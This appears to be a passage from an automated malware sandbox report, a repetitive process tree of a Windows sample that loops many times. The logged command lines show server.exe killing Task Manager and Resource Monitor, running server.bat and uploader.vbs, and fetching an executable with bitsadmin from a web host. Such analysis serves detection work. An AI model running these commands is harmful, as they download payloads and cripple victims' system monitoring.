        PID:740
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2168
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2120
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:672
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:872
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2864
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2152
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2564
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1604
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2660
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2512
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2872
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1328
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2876
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2924
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:536
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:1160
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2612
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2468
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1196
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:756
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1648
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2348
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2804
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1868
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2496
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1640
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1516
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:572
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2188
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1460
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2816
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2696
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1756
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2384
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2092
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1648
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1448
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1540
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2700
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1304
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2868
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1728
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2076
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2800
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:660
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2148
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2432
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2244
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2412
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:528
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1244
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2260
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1788
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2840
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1104
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2124
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2824
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1132
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2996
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:2456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2540
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2532
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2340
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2676
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2808
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1772
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2836
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2116
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:1040
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2484
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:328
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2664
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2032
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1136
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:1140
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1752
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2816
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:188
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2788
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:800
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:324
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2968
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:320
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1076
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1268
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1700
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2780
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:764
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2620
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:616
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2596
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1644
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2428
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2060
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1776
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2260
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2964
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1196
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2728
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2544
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:272
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:2872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2152
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2368
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:3004
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2804
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:924
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1516
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:1808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2196
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2004
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1944
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1712
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2920
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2648
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:1780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:904
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2136
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1724
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:2264
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1296
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1812
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2248
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:2660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2452
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2872
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2840
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:2124
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:3008
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
